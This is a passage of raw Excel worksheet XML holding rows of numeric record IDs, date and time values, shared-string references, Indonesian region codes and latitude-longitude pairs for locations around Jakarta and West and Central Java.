        <v>-6.15816,106.83421</v>
      </c>
    </row>
    <row r="2907" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2907">
        <v>237538</v>
      </c>
      <c r="B2907" s="1">
        <v>44235</v>
      </c>
      <c r="C2907" s="2">
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="D2907" t="s">
        <v>2648</v>
      </c>
      <c r="E2907" t="s">
        <v>23</v>
      </c>
      <c r="G2907" t="s">
        <v>9830</v>
      </c>
      <c r="H2907" t="s">
        <v>26</v>
      </c>
      <c r="J2907" t="s">
        <v>1605</v>
      </c>
      <c r="L2907" t="s">
        <v>2716</v>
      </c>
      <c r="M2907">
        <v>3174040007</v>
      </c>
      <c r="N2907">
        <v>3174040</v>
      </c>
      <c r="O2907">
        <v>3174</v>
      </c>
      <c r="P2907">
        <v>31</v>
      </c>
      <c r="Q2907" t="s">
        <v>389</v>
      </c>
      <c r="R2907" t="s">
        <v>377</v>
      </c>
      <c r="S2907" t="s">
        <v>32</v>
      </c>
      <c r="T2907" t="s">
        <v>33</v>
      </c>
      <c r="U2907" s="5">
        <v>10678625</v>
      </c>
      <c r="V2907" s="5" t="s">
        <v>17065</v>
      </c>
      <c r="W2907" s="5">
        <v>-614763</v>
      </c>
      <c r="X2907" t="s">
        <v>20805</v>
      </c>
      <c r="Y2907" t="str">
        <f t="shared" si="45"/>
        <v>-6.14763,106.78625</v>
      </c>
    </row>
    <row r="2908" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2908">
        <v>237843</v>
      </c>
      <c r="B2908" s="1">
        <v>44235</v>
      </c>
      <c r="C2908" s="2">
        <v>6.5416666666666665E-2</v>
      </c>
      <c r="D2908" t="s">
        <v>22</v>
      </c>
      <c r="E2908" t="s">
        <v>23</v>
      </c>
      <c r="F2908" t="s">
        <v>9831</v>
      </c>
      <c r="G2908" t="s">
        <v>9832</v>
      </c>
      <c r="H2908" t="s">
        <v>26</v>
      </c>
      <c r="I2908" t="s">
        <v>1034</v>
      </c>
      <c r="J2908" t="s">
        <v>9833</v>
      </c>
      <c r="M2908">
        <v>3173050003</v>
      </c>
      <c r="N2908">
        <v>3173050</v>
      </c>
      <c r="O2908">
        <v>3173</v>
      </c>
      <c r="P2908">
        <v>31</v>
      </c>
      <c r="Q2908" t="s">
        <v>2333</v>
      </c>
      <c r="R2908" t="s">
        <v>589</v>
      </c>
      <c r="S2908" t="s">
        <v>62</v>
      </c>
      <c r="T2908" t="s">
        <v>33</v>
      </c>
      <c r="U2908" s="5">
        <v>10686754</v>
      </c>
      <c r="V2908" s="5" t="s">
        <v>15932</v>
      </c>
      <c r="W2908" s="5">
        <v>-618685</v>
      </c>
      <c r="X2908" t="s">
        <v>20079</v>
      </c>
      <c r="Y2908" t="str">
        <f t="shared" si="45"/>
        <v>-6.18685,106.86754</v>
      </c>
    </row>
    <row r="2909" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2909">
        <v>237954</v>
      </c>
      <c r="B2909" s="1">
        <v>44235</v>
      </c>
      <c r="C2909" s="2">
        <v>8.3043981481481483E-2</v>
      </c>
      <c r="D2909" t="s">
        <v>22</v>
      </c>
      <c r="E2909" t="s">
        <v>23</v>
      </c>
      <c r="F2909" t="s">
        <v>9834</v>
      </c>
      <c r="G2909" t="s">
        <v>9835</v>
      </c>
      <c r="H2909" t="s">
        <v>26</v>
      </c>
      <c r="I2909" t="s">
        <v>9836</v>
      </c>
      <c r="J2909" t="s">
        <v>1656</v>
      </c>
      <c r="L2909" t="s">
        <v>9837</v>
      </c>
      <c r="M2909">
        <v>3173080003</v>
      </c>
      <c r="N2909">
        <v>3173080</v>
      </c>
      <c r="O2909">
        <v>3173</v>
      </c>
      <c r="P2909">
        <v>31</v>
      </c>
      <c r="Q2909" t="s">
        <v>157</v>
      </c>
      <c r="R2909" t="s">
        <v>157</v>
      </c>
      <c r="S2909" t="s">
        <v>62</v>
      </c>
      <c r="T2909" t="s">
        <v>33</v>
      </c>
      <c r="U2909" s="5">
        <v>10682715</v>
      </c>
      <c r="V2909" s="5" t="s">
        <v>16381</v>
      </c>
      <c r="W2909" s="5">
        <v>-617539</v>
      </c>
      <c r="X2909" t="s">
        <v>19329</v>
      </c>
      <c r="Y2909" t="str">
        <f t="shared" si="45"/>
        <v>-6.17539,106.82715</v>
      </c>
    </row>
    <row r="2910" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2910">
        <v>237955</v>
      </c>
      <c r="B2910" s="1">
        <v>44235</v>
      </c>
      <c r="C2910" s="2">
        <v>8.3715277777777777E-2</v>
      </c>
      <c r="D2910" t="s">
        <v>22</v>
      </c>
      <c r="E2910" t="s">
        <v>23</v>
      </c>
      <c r="F2910" t="s">
        <v>9838</v>
      </c>
      <c r="G2910" t="s">
        <v>9839</v>
      </c>
      <c r="H2910" t="s">
        <v>26</v>
      </c>
      <c r="I2910" t="s">
        <v>1161</v>
      </c>
      <c r="J2910" t="s">
        <v>2627</v>
      </c>
      <c r="L2910" t="s">
        <v>9840</v>
      </c>
      <c r="M2910">
        <v>3216022004</v>
      </c>
      <c r="N2910">
        <v>3216022</v>
      </c>
      <c r="O2910">
        <v>3216</v>
      </c>
      <c r="P2910">
        <v>32</v>
      </c>
      <c r="Q2910" t="s">
        <v>9841</v>
      </c>
      <c r="R2910" t="s">
        <v>9842</v>
      </c>
      <c r="S2910" t="s">
        <v>41</v>
      </c>
      <c r="T2910" t="s">
        <v>42</v>
      </c>
      <c r="U2910" s="5">
        <v>10721386</v>
      </c>
      <c r="V2910" s="5" t="s">
        <v>17066</v>
      </c>
      <c r="W2910" s="5">
        <v>-633447</v>
      </c>
      <c r="X2910" t="s">
        <v>20806</v>
      </c>
      <c r="Y2910" t="str">
        <f t="shared" si="45"/>
        <v>-6.33447,107.21386</v>
      </c>
    </row>
    <row r="2911" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2911">
        <v>237978</v>
      </c>
      <c r="B2911" s="1">
        <v>44235</v>
      </c>
      <c r="C2911" s="2">
        <v>8.4444444444444447E-2</v>
      </c>
      <c r="D2911" t="s">
        <v>22</v>
      </c>
      <c r="E2911" t="s">
        <v>23</v>
      </c>
      <c r="F2911" t="s">
        <v>9843</v>
      </c>
      <c r="G2911" t="s">
        <v>9844</v>
      </c>
      <c r="H2911" t="s">
        <v>26</v>
      </c>
      <c r="I2911" t="s">
        <v>1187</v>
      </c>
      <c r="J2911" t="s">
        <v>2506</v>
      </c>
      <c r="L2911" t="s">
        <v>1096</v>
      </c>
      <c r="M2911">
        <v>3172060008</v>
      </c>
      <c r="N2911">
        <v>3172060</v>
      </c>
      <c r="O2911">
        <v>3172</v>
      </c>
      <c r="P2911">
        <v>31</v>
      </c>
      <c r="Q2911" t="s">
        <v>1096</v>
      </c>
      <c r="R2911" t="s">
        <v>48</v>
      </c>
      <c r="S2911" t="s">
        <v>49</v>
      </c>
      <c r="T2911" t="s">
        <v>33</v>
      </c>
      <c r="U2911" s="5">
        <v>10686355</v>
      </c>
      <c r="V2911" s="5" t="s">
        <v>17067</v>
      </c>
      <c r="W2911" s="5">
        <v>-621611</v>
      </c>
      <c r="X2911" t="s">
        <v>20807</v>
      </c>
      <c r="Y2911" t="str">
        <f t="shared" si="45"/>
        <v>-6.21611,106.86355</v>
      </c>
    </row>
    <row r="2912" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2912">
        <v>238045</v>
      </c>
      <c r="B2912" s="1">
        <v>44235</v>
      </c>
      <c r="C2912" s="2">
        <v>9.2650462962962962E-2</v>
      </c>
      <c r="D2912" t="s">
        <v>22</v>
      </c>
      <c r="E2912" t="s">
        <v>23</v>
      </c>
      <c r="F2912" t="s">
        <v>9845</v>
      </c>
      <c r="G2912" t="s">
        <v>9846</v>
      </c>
      <c r="H2912" t="s">
        <v>26</v>
      </c>
      <c r="I2912" t="s">
        <v>193</v>
      </c>
      <c r="J2912" t="s">
        <v>2627</v>
      </c>
      <c r="L2912" t="s">
        <v>9847</v>
      </c>
      <c r="M2912">
        <v>3212010013</v>
      </c>
      <c r="N2912">
        <v>3212010</v>
      </c>
      <c r="O2912">
        <v>3212</v>
      </c>
      <c r="P2912">
        <v>32</v>
      </c>
      <c r="Q2912" t="s">
        <v>9848</v>
      </c>
      <c r="R2912" t="s">
        <v>9820</v>
      </c>
      <c r="S2912" t="s">
        <v>8471</v>
      </c>
      <c r="T2912" t="s">
        <v>42</v>
      </c>
      <c r="U2912" s="5">
        <v>10793588</v>
      </c>
      <c r="V2912" s="5" t="s">
        <v>17068</v>
      </c>
      <c r="W2912" s="5">
        <v>-645686</v>
      </c>
      <c r="X2912" t="s">
        <v>20808</v>
      </c>
      <c r="Y2912" t="str">
        <f t="shared" si="45"/>
        <v>-6.45686,107.93588</v>
      </c>
    </row>
    <row r="2913" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2913">
        <v>238124</v>
      </c>
      <c r="B2913" s="1">
        <v>44235</v>
      </c>
      <c r="C2913" s="2">
        <v>0.10538194444444444</v>
      </c>
      <c r="D2913" t="s">
        <v>22</v>
      </c>
      <c r="E2913" t="s">
        <v>23</v>
      </c>
      <c r="F2913" t="s">
        <v>9849</v>
      </c>
      <c r="H2913" t="s">
        <v>26</v>
      </c>
      <c r="I2913" t="s">
        <v>1624</v>
      </c>
      <c r="J2913" t="s">
        <v>9850</v>
      </c>
      <c r="L2913" t="s">
        <v>9851</v>
      </c>
      <c r="M2913">
        <v>3172060008</v>
      </c>
      <c r="N2913">
        <v>3172060</v>
      </c>
      <c r="O2913">
        <v>3172</v>
      </c>
      <c r="P2913">
        <v>31</v>
      </c>
      <c r="Q2913" t="s">
        <v>1096</v>
      </c>
      <c r="R2913" t="s">
        <v>48</v>
      </c>
      <c r="S2913" t="s">
        <v>49</v>
      </c>
      <c r="T2913" t="s">
        <v>33</v>
      </c>
      <c r="U2913" s="5">
        <v>10686282</v>
      </c>
      <c r="V2913" s="5" t="s">
        <v>17069</v>
      </c>
      <c r="W2913" s="5">
        <v>-621928</v>
      </c>
      <c r="X2913" t="s">
        <v>20809</v>
      </c>
      <c r="Y2913" t="str">
        <f t="shared" si="45"/>
        <v>-6.21928,106.86282</v>
      </c>
    </row>
    <row r="2914" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2914">
        <v>238210</v>
      </c>
      <c r="B2914" s="1">
        <v>44235</v>
      </c>
      <c r="C2914" s="2">
        <v>0.12045138888888889</v>
      </c>
      <c r="D2914" t="s">
        <v>22</v>
      </c>
      <c r="E2914" t="s">
        <v>23</v>
      </c>
      <c r="F2914" t="s">
        <v>9852</v>
      </c>
      <c r="H2914" t="s">
        <v>26</v>
      </c>
      <c r="I2914" t="s">
        <v>166</v>
      </c>
      <c r="J2914" t="s">
        <v>9853</v>
      </c>
      <c r="L2914" t="s">
        <v>9854</v>
      </c>
      <c r="M2914">
        <v>3374100004</v>
      </c>
      <c r="N2914">
        <v>3374100</v>
      </c>
      <c r="O2914">
        <v>3374</v>
      </c>
      <c r="P2914">
        <v>33</v>
      </c>
      <c r="Q2914" t="s">
        <v>9855</v>
      </c>
      <c r="R2914" t="s">
        <v>9608</v>
      </c>
      <c r="S2914" t="s">
        <v>1334</v>
      </c>
      <c r="T2914" t="s">
        <v>1134</v>
      </c>
      <c r="U2914" s="5">
        <v>11044897</v>
      </c>
      <c r="V2914" s="5" t="s">
        <v>17070</v>
      </c>
      <c r="W2914" s="5">
        <v>-697885</v>
      </c>
      <c r="X2914" t="s">
        <v>20810</v>
      </c>
      <c r="Y2914" t="str">
        <f t="shared" si="45"/>
        <v>-6.97885,110.44897</v>
      </c>
    </row>
    <row r="2915" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2915">
        <v>238228</v>
      </c>
      <c r="B2915" s="1">
        <v>44235</v>
      </c>
      <c r="C2915" s="2">
        <v>0.12351851851851851</v>
      </c>
      <c r="D2915" t="s">
        <v>22</v>
      </c>
      <c r="E2915" t="s">
        <v>23</v>
      </c>
      <c r="F2915" t="s">
        <v>9856</v>
      </c>
      <c r="G2915" t="s">
        <v>9857</v>
      </c>
      <c r="H2915" t="s">
        <v>26</v>
      </c>
      <c r="I2915" t="s">
        <v>517</v>
      </c>
      <c r="J2915" t="s">
        <v>2627</v>
      </c>
      <c r="L2915" t="s">
        <v>9858</v>
      </c>
      <c r="M2915">
        <v>3210190006</v>
      </c>
      <c r="N2915">
        <v>3210190</v>
      </c>
      <c r="O2915">
        <v>3210</v>
      </c>
      <c r="P2915">
        <v>32</v>
      </c>
      <c r="Q2915" t="s">
        <v>9859</v>
      </c>
      <c r="R2915" t="s">
        <v>9860</v>
      </c>
      <c r="S2915" t="s">
        <v>9861</v>
      </c>
      <c r="T2915" t="s">
        <v>42</v>
      </c>
      <c r="U2915" s="5">
        <v>10824504</v>
      </c>
      <c r="V2915" s="5" t="s">
        <v>17071</v>
      </c>
      <c r="W2915" s="5">
        <v>-665637</v>
      </c>
      <c r="X2915" t="s">
        <v>20811</v>
      </c>
      <c r="Y2915" t="str">
        <f t="shared" si="45"/>
        <v>-6.65637,108.24504</v>
      </c>
    </row>
    <row r="2916" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2916">
        <v>238229</v>
      </c>
      <c r="B2916" s="1">
        <v>44235</v>
      </c>
      <c r="C2916" s="2">
        <v>0.12291666666666667</v>
      </c>
      <c r="D2916" t="s">
        <v>2648</v>
      </c>
      <c r="E2916" t="s">
        <v>23</v>
      </c>
      <c r="G2916" t="s">
        <v>9862</v>
      </c>
      <c r="H2916" t="s">
        <v>26</v>
      </c>
      <c r="J2916" t="s">
        <v>9863</v>
      </c>
      <c r="L2916" t="s">
        <v>9864</v>
      </c>
      <c r="M2916">
        <v>3172070007</v>
      </c>
      <c r="N2916">
        <v>3172070</v>
      </c>
      <c r="O2916">
        <v>3172</v>
      </c>
      <c r="P2916">
        <v>31</v>
      </c>
      <c r="Q2916" t="s">
        <v>3186</v>
      </c>
      <c r="R2916" t="s">
        <v>128</v>
      </c>
      <c r="S2916" t="s">
        <v>49</v>
      </c>
      <c r="T2916" t="s">
        <v>33</v>
      </c>
      <c r="U2916" s="5">
        <v>10689918</v>
      </c>
      <c r="V2916" s="5" t="s">
        <v>17072</v>
      </c>
      <c r="W2916" s="5">
        <v>-622426</v>
      </c>
      <c r="X2916" t="s">
        <v>20812</v>
      </c>
      <c r="Y2916" t="str">
        <f t="shared" si="45"/>
        <v>-6.22426,106.89918</v>
      </c>
    </row>
    <row r="2917" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2917">
        <v>238322</v>
      </c>
      <c r="B2917" s="1">
        <v>44235</v>
      </c>
      <c r="C2917" s="2">
        <v>0.13749999999999998</v>
      </c>
      <c r="D2917" t="s">
        <v>2648</v>
      </c>
      <c r="E2917" t="s">
        <v>23</v>
      </c>
      <c r="G2917" t="s">
        <v>9865</v>
      </c>
      <c r="H2917" t="s">
        <v>26</v>
      </c>
      <c r="J2917" t="s">
        <v>9866</v>
      </c>
      <c r="L2917" t="s">
        <v>9867</v>
      </c>
      <c r="M2917">
        <v>3172060007</v>
      </c>
      <c r="N2917">
        <v>3172060</v>
      </c>
      <c r="O2917">
        <v>3172</v>
      </c>
      <c r="P2917">
        <v>31</v>
      </c>
      <c r="Q2917" t="s">
        <v>817</v>
      </c>
      <c r="R2917" t="s">
        <v>48</v>
      </c>
      <c r="S2917" t="s">
        <v>49</v>
      </c>
      <c r="T2917" t="s">
        <v>33</v>
      </c>
      <c r="U2917" s="5">
        <v>10686603</v>
      </c>
      <c r="V2917" s="5" t="s">
        <v>17073</v>
      </c>
      <c r="W2917" s="5">
        <v>-621628</v>
      </c>
      <c r="X2917" t="s">
        <v>20813</v>
      </c>
      <c r="Y2917" t="str">
        <f t="shared" si="45"/>
        <v>-6.21628,106.86603</v>
      </c>
    </row>
    <row r="2918" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2918">
        <v>238341</v>
      </c>
      <c r="B2918" s="1">
        <v>44235</v>
      </c>
      <c r="C2918" s="2">
        <v>0.14097222222222222</v>
      </c>
      <c r="D2918" t="s">
        <v>2648</v>
      </c>
      <c r="E2918" t="s">
        <v>23</v>
      </c>
      <c r="G2918" t="s">
        <v>9868</v>
      </c>
      <c r="H2918" t="s">
        <v>26</v>
      </c>
      <c r="J2918" t="s">
        <v>2506</v>
      </c>
      <c r="L2918" t="s">
        <v>9869</v>
      </c>
      <c r="M2918">
        <v>3172060008</v>
      </c>
      <c r="N2918">
        <v>3172060</v>
      </c>
      <c r="O2918">
        <v>3172</v>
      </c>
      <c r="P2918">
        <v>31</v>
      </c>
      <c r="Q2918" t="s">
        <v>1096</v>
      </c>
      <c r="R2918" t="s">
        <v>48</v>
      </c>
      <c r="S2918" t="s">
        <v>49</v>
      </c>
      <c r="T2918" t="s">
        <v>33</v>
      </c>
      <c r="U2918" s="5">
        <v>10686271</v>
      </c>
      <c r="V2918" s="5" t="s">
        <v>17074</v>
      </c>
      <c r="W2918" s="5">
        <v>-621585</v>
      </c>
      <c r="X2918" t="s">
        <v>20814</v>
      </c>
      <c r="Y2918" t="str">
        <f t="shared" si="45"/>
        <v>-6.21585,106.86271</v>
      </c>
    </row>
    <row r="2919" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2919">
        <v>238498</v>
      </c>
      <c r="B2919" s="1">
        <v>44235</v>
      </c>
      <c r="C2919" s="2">
        <v>0.17041666666666666</v>
      </c>
      <c r="D2919" t="s">
        <v>22</v>
      </c>
      <c r="E2919" t="s">
        <v>23</v>
      </c>
      <c r="F2919" t="s">
        <v>9870</v>
      </c>
      <c r="G2919" t="s">
        <v>9871</v>
      </c>
      <c r="H2919" t="s">
        <v>26</v>
      </c>
      <c r="I2919" t="s">
        <v>517</v>
      </c>
      <c r="J2919" t="s">
        <v>2627</v>
      </c>
      <c r="L2919" t="s">
        <v>9872</v>
      </c>
      <c r="M2919">
        <v>3213180002</v>
      </c>
      <c r="N2919">
        <v>3213180</v>
      </c>
      <c r="O2919">
        <v>3213</v>
      </c>
      <c r="P2919">
        <v>32</v>
      </c>
      <c r="Q2919" t="s">
        <v>9873</v>
      </c>
      <c r="R2919" t="s">
        <v>9874</v>
      </c>
      <c r="S2919" t="s">
        <v>5179</v>
      </c>
      <c r="T2919" t="s">
        <v>42</v>
      </c>
      <c r="U2919" s="5">
        <v>10769912</v>
      </c>
      <c r="V2919" s="5" t="s">
        <v>17075</v>
      </c>
      <c r="W2919" s="5">
        <v>-631853</v>
      </c>
      <c r="X2919" t="s">
        <v>20815</v>
      </c>
      <c r="Y2919" t="str">
        <f t="shared" si="45"/>
        <v>-6.31853,107.69912</v>
      </c>
    </row>
    <row r="2920" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2920">
        <v>238499</v>
      </c>
      <c r="B2920" s="1">
        <v>44235</v>
      </c>
      <c r="C2920" s="2">
        <v>0.17122685185185185</v>
      </c>
      <c r="D2920" t="s">
        <v>22</v>
      </c>
      <c r="E2920" t="s">
        <v>23</v>
      </c>
      <c r="F2920" t="s">
        <v>9875</v>
      </c>
      <c r="G2920" t="s">
        <v>9876</v>
      </c>
      <c r="H2920" t="s">
        <v>26</v>
      </c>
      <c r="I2920" t="s">
        <v>974</v>
      </c>
      <c r="J2920" t="s">
        <v>2627</v>
      </c>
      <c r="L2920" t="s">
        <v>9877</v>
      </c>
      <c r="M2920">
        <v>3215072001</v>
      </c>
      <c r="N2920">
        <v>3215072</v>
      </c>
      <c r="O2920">
        <v>3215</v>
      </c>
      <c r="P2920">
        <v>32</v>
      </c>
      <c r="Q2920" t="s">
        <v>9878</v>
      </c>
      <c r="R2920" t="s">
        <v>9879</v>
      </c>
      <c r="S2920" t="s">
        <v>3979</v>
      </c>
      <c r="T2920" t="s">
        <v>42</v>
      </c>
      <c r="U2920" s="5">
        <v>10747077</v>
      </c>
      <c r="V2920" s="5" t="s">
        <v>17076</v>
      </c>
      <c r="W2920" s="5">
        <v>-641683</v>
      </c>
      <c r="X2920" t="s">
        <v>20816</v>
      </c>
      <c r="Y2920" t="str">
        <f t="shared" si="45"/>
        <v>-6.41683,107.47077</v>
      </c>
    </row>
    <row r="2921" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2921">
        <v>238600</v>
      </c>
      <c r="B2921" s="1">
        <v>44235</v>
      </c>
      <c r="C2921" s="2">
        <v>0.18224537037037036</v>
      </c>
      <c r="D2921" t="s">
        <v>22</v>
      </c>
      <c r="E2921" t="s">
        <v>23</v>
      </c>
      <c r="F2921" t="s">
        <v>9880</v>
      </c>
      <c r="G2921" t="s">
        <v>9881</v>
      </c>
      <c r="H2921" t="s">
        <v>26</v>
      </c>
      <c r="I2921" t="s">
        <v>834</v>
      </c>
      <c r="J2921" t="s">
        <v>2627</v>
      </c>
      <c r="L2921" t="s">
        <v>9882</v>
      </c>
      <c r="M2921">
        <v>3212041006</v>
      </c>
      <c r="N2921">
        <v>3212041</v>
      </c>
      <c r="O2921">
        <v>3212</v>
      </c>
      <c r="P2921">
        <v>32</v>
      </c>
      <c r="Q2921" t="s">
        <v>9815</v>
      </c>
      <c r="R2921" t="s">
        <v>9816</v>
      </c>
      <c r="S2921" t="s">
        <v>8471</v>
      </c>
      <c r="T2921" t="s">
        <v>42</v>
      </c>
      <c r="U2921" s="5">
        <v>10816106</v>
      </c>
      <c r="V2921" s="5" t="s">
        <v>17077</v>
      </c>
      <c r="W2921" s="5">
        <v>-646996</v>
      </c>
      <c r="X2921" t="s">
        <v>20817</v>
      </c>
      <c r="Y2921" t="str">
        <f t="shared" si="45"/>
        <v>-6.46996,108.16106</v>
      </c>
    </row>
    <row r="2922" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2922">
        <v>238601</v>
      </c>
      <c r="B2922" s="1">
        <v>44235</v>
      </c>
      <c r="C2922" s="2">
        <v>0.18293981481481481</v>
      </c>
      <c r="D2922" t="s">
        <v>22</v>
      </c>
      <c r="E2922" t="s">
        <v>23</v>
      </c>
      <c r="F2922" t="s">
        <v>9883</v>
      </c>
      <c r="G2922" t="s">
        <v>9884</v>
      </c>
      <c r="H2922" t="s">
        <v>26</v>
      </c>
      <c r="I2922" t="s">
        <v>137</v>
      </c>
      <c r="J2922" t="s">
        <v>2627</v>
      </c>
      <c r="L2922" t="s">
        <v>9885</v>
      </c>
      <c r="M2922">
        <v>3213180010</v>
      </c>
      <c r="N2922">
        <v>3213180</v>
      </c>
      <c r="O2922">
        <v>3213</v>
      </c>
      <c r="P2922">
        <v>32</v>
      </c>
      <c r="Q2922" t="s">
        <v>9886</v>
      </c>
      <c r="R2922" t="s">
        <v>9874</v>
      </c>
      <c r="S2922" t="s">
        <v>5179</v>
      </c>
      <c r="T2922" t="s">
        <v>42</v>
      </c>
      <c r="U2922" s="5">
        <v>10759877</v>
      </c>
      <c r="V2922" s="5" t="s">
        <v>17078</v>
      </c>
      <c r="W2922" s="5">
        <v>-628627</v>
      </c>
      <c r="X2922" t="s">
        <v>20818</v>
      </c>
      <c r="Y2922" t="str">
        <f t="shared" si="45"/>
        <v>-6.28627,107.59877</v>
      </c>
    </row>
    <row r="2923" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2923">
        <v>238722</v>
      </c>
      <c r="B2923" s="1">
        <v>44235</v>
      </c>
      <c r="C2923" s="2">
        <v>0.20466435185185183</v>
      </c>
      <c r="D2923" t="s">
        <v>22</v>
      </c>
      <c r="E2923" t="s">
        <v>23</v>
      </c>
      <c r="F2923" t="s">
        <v>9887</v>
      </c>
      <c r="H2923" t="s">
        <v>26</v>
      </c>
      <c r="I2923" t="s">
        <v>511</v>
      </c>
      <c r="J2923" t="s">
        <v>6605</v>
      </c>
      <c r="L2923" t="s">
        <v>9888</v>
      </c>
      <c r="M2923">
        <v>3171010003</v>
      </c>
      <c r="N2923">
        <v>3171010</v>
      </c>
      <c r="O2923">
        <v>3171</v>
      </c>
      <c r="P2923">
        <v>31</v>
      </c>
      <c r="Q2923" t="s">
        <v>263</v>
      </c>
      <c r="R2923" t="s">
        <v>264</v>
      </c>
      <c r="S2923" t="s">
        <v>108</v>
      </c>
      <c r="T2923" t="s">
        <v>33</v>
      </c>
      <c r="U2923" s="5">
        <v>10681569</v>
      </c>
      <c r="V2923" s="5" t="s">
        <v>17079</v>
      </c>
      <c r="W2923" s="5">
        <v>-634514</v>
      </c>
      <c r="X2923" t="s">
        <v>20819</v>
      </c>
      <c r="Y2923" t="str">
        <f t="shared" si="45"/>
        <v>-6.34514,106.81569</v>
      </c>
    </row>
    <row r="2924" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2924">
        <v>238783</v>
      </c>
      <c r="B2924" s="1">
        <v>44235</v>
      </c>
      <c r="C2924" s="2">
        <v>0.21637731481481481</v>
      </c>
      <c r="D2924" t="s">
        <v>22</v>
      </c>
      <c r="E2924" t="s">
        <v>23</v>
      </c>
      <c r="F2924" t="s">
        <v>9889</v>
      </c>
      <c r="H2924" t="s">
        <v>26</v>
      </c>
      <c r="I2924" t="s">
        <v>974</v>
      </c>
      <c r="J2924" t="s">
        <v>2627</v>
      </c>
      <c r="L2924" t="s">
        <v>9890</v>
      </c>
      <c r="M2924">
        <v>3275041004</v>
      </c>
      <c r="N2924">
        <v>3275041</v>
      </c>
      <c r="O2924">
        <v>3275</v>
      </c>
      <c r="P2924">
        <v>32</v>
      </c>
      <c r="Q2924" t="s">
        <v>133</v>
      </c>
      <c r="R2924" t="s">
        <v>134</v>
      </c>
      <c r="S2924" t="s">
        <v>41</v>
      </c>
      <c r="T2924" t="s">
        <v>42</v>
      </c>
      <c r="U2924" s="5">
        <v>10700866</v>
      </c>
      <c r="V2924" s="5" t="s">
        <v>17080</v>
      </c>
      <c r="W2924" s="5">
        <v>-627167</v>
      </c>
      <c r="X2924" t="s">
        <v>20820</v>
      </c>
      <c r="Y2924" t="str">
        <f t="shared" si="45"/>
        <v>-6.27167,107.00866</v>
      </c>
    </row>
    <row r="2925" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2925">
        <v>238879</v>
      </c>
      <c r="B2925" s="1">
        <v>44235</v>
      </c>
      <c r="C2925" s="2">
        <v>0.22916666666666666</v>
      </c>
      <c r="D2925" t="s">
        <v>2648</v>
      </c>
      <c r="E2925" t="s">
        <v>23</v>
      </c>
      <c r="G2925" t="s">
        <v>9891</v>
      </c>
      <c r="H2925" t="s">
        <v>26</v>
      </c>
      <c r="J2925" t="s">
        <v>2905</v>
      </c>
      <c r="L2925" t="s">
        <v>9892</v>
      </c>
      <c r="M2925">
        <v>3171090005</v>
      </c>
      <c r="N2925">
        <v>3171090</v>
      </c>
      <c r="O2925">
        <v>3171</v>
      </c>
      <c r="P2925">
        <v>31</v>
      </c>
      <c r="Q2925" t="s">
        <v>1300</v>
      </c>
      <c r="R2925" t="s">
        <v>347</v>
      </c>
      <c r="S2925" t="s">
        <v>108</v>
      </c>
      <c r="T2925" t="s">
        <v>33</v>
      </c>
      <c r="U2925" s="5">
        <v>10685983</v>
      </c>
      <c r="V2925" s="5" t="s">
        <v>16485</v>
      </c>
      <c r="W2925" s="5">
        <v>-622110</v>
      </c>
      <c r="X2925" t="s">
        <v>20821</v>
      </c>
      <c r="Y2925" t="str">
        <f t="shared" si="45"/>
        <v>-6.22110,106.85983</v>
      </c>
    </row>
    <row r="2926" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2926">
        <v>238924</v>
      </c>
      <c r="B2926" s="1">
        <v>44235</v>
      </c>
      <c r="C2926" s="2">
        <v>0.23541666666666669</v>
      </c>
      <c r="D2926" t="s">
        <v>2648</v>
      </c>
      <c r="E2926" t="s">
        <v>23</v>
      </c>
      <c r="G2926" t="s">
        <v>9893</v>
      </c>
      <c r="H2926" t="s">
        <v>26</v>
      </c>
      <c r="J2926" t="s">
        <v>404</v>
      </c>
      <c r="L2926" t="s">
        <v>9894</v>
      </c>
      <c r="M2926">
        <v>3174020005</v>
      </c>
      <c r="N2926">
        <v>3174020</v>
      </c>
      <c r="O2926">
        <v>3174</v>
      </c>
      <c r="P2926">
        <v>31</v>
      </c>
      <c r="Q2926" t="s">
        <v>30</v>
      </c>
      <c r="R2926" t="s">
        <v>31</v>
      </c>
      <c r="S2926" t="s">
        <v>32</v>
      </c>
      <c r="T2926" t="s">
        <v>33</v>
      </c>
      <c r="U2926" s="5">
        <v>10677080</v>
      </c>
      <c r="V2926" s="5" t="s">
        <v>17040</v>
      </c>
      <c r="W2926" s="5">
        <v>-616648</v>
      </c>
      <c r="X2926" t="s">
        <v>20778</v>
      </c>
      <c r="Y2926" t="str">
        <f t="shared" si="45"/>
        <v>-6.16648,106.77080</v>
      </c>
    </row>
    <row r="2927" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2927">
        <v>238933</v>
      </c>
      <c r="B2927" s="1">
        <v>44235</v>
      </c>
      <c r="C2927" s="2">
        <v>0.23611111111111113</v>
      </c>
      <c r="D2927" t="s">
        <v>2648</v>
      </c>
      <c r="E2927" t="s">
        <v>23</v>
      </c>
      <c r="G2927" t="s">
        <v>9895</v>
      </c>
      <c r="H2927" t="s">
        <v>26</v>
      </c>
      <c r="J2927" t="s">
        <v>404</v>
      </c>
      <c r="L2927" t="s">
        <v>9896</v>
      </c>
      <c r="M2927">
        <v>3174020005</v>
      </c>
      <c r="N2927">
        <v>3174020</v>
      </c>
      <c r="O2927">
        <v>3174</v>
      </c>
      <c r="P2927">
        <v>31</v>
      </c>
      <c r="Q2927" t="s">
        <v>30</v>
      </c>
      <c r="R2927" t="s">
        <v>31</v>
      </c>
      <c r="S2927" t="s">
        <v>32</v>
      </c>
      <c r="T2927" t="s">
        <v>33</v>
      </c>
      <c r="U2927" s="5">
        <v>10677087</v>
      </c>
